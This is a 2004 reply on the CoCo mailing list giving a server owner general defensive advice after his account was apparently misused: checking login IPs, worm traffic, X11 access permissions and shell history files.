[Coco] Re: Not sure about the Barden issue

John E. Malmberg wb8tyw at qsl.net
Wed Jul 28 20:03:45 EDT 2004


Boisy G. Pitre wrote:
> John,
> 
> There was no hacking going on at all.

I was referring to hacking in the generic term as any unauthorized use 
of your server.

 > The system log shows a normal login through SSH that would not have
 > raised any flags with me whatsoever.

Does that log show the originating I.P. address?

> Since this fiasco, my machine has locked up repeatedly and I am 
> currently looking at it to figure out if (a) the same individual placed 
> some type of rogue application on the server

Assuming that the account given out was not privileged, there should be 
limited places that it can put such an application.

> or (b) someone from this group is targeting my IP address as a means of
 > revenge.  So if anyone on this list is taking advantage of this situation
 > by attempting to raze my system, please stop.  My attempts to provide a
 > service to CoCo folks is providing me more grief than it's worth, 
frankly.

On Monday at least one new worm came out, and that is attacking many 
systems, even if your system is not vulnerable to infection, just the 
traffic on your network segment can cause problems.

I would be surprised if someone was specifically targeting you, as I 
recall only seeing helpful posts from you, never anything controversial.

I have seen small UNIX systems overwhelmed to the point of being 
shutdown just from the default I/O buffer allocations being exhausted 
from similar network activity.  Usually that can be fixed with tuning. 
In the case of that specific UNIX system, I had to run a script that 
rebuilt the kernel.

Not having specific knowledge of LINUX, I do not know how to check for 
such things on it.

As I stated before, if your configuration allows you to direct the X-11 
output of other computers to yours, the former security settings 
available to X-11 allowed those remote computers to slave your keyboard, 
mouse, and screen with out any visible indication.  Which means that any 
user of those computers could have access to anything that was displayed 
on your screen, or typed in at the keyboard.  So checking your X-11 
access permissions may be needed.

For some X-11 configurations, the default is wide open unless you 
implement restrictions.  For the current SUSE distribution, it appears 
to be locked down.

Since the Hotmail server indicated that HTTP access was used, I sent to 
your gmane munged address some further places to look for things that 
the person may have left behind with out realizing it.  Gmane claims 
that it sent the message.

If they displayed an X-11 gui application back to their computer, it's 
I.P. address may also be in one of the data files, particularly in 
.history .

-John
wb8tyw(at)qsl.net
Personal Opinion Only




More information about the Coco mailing list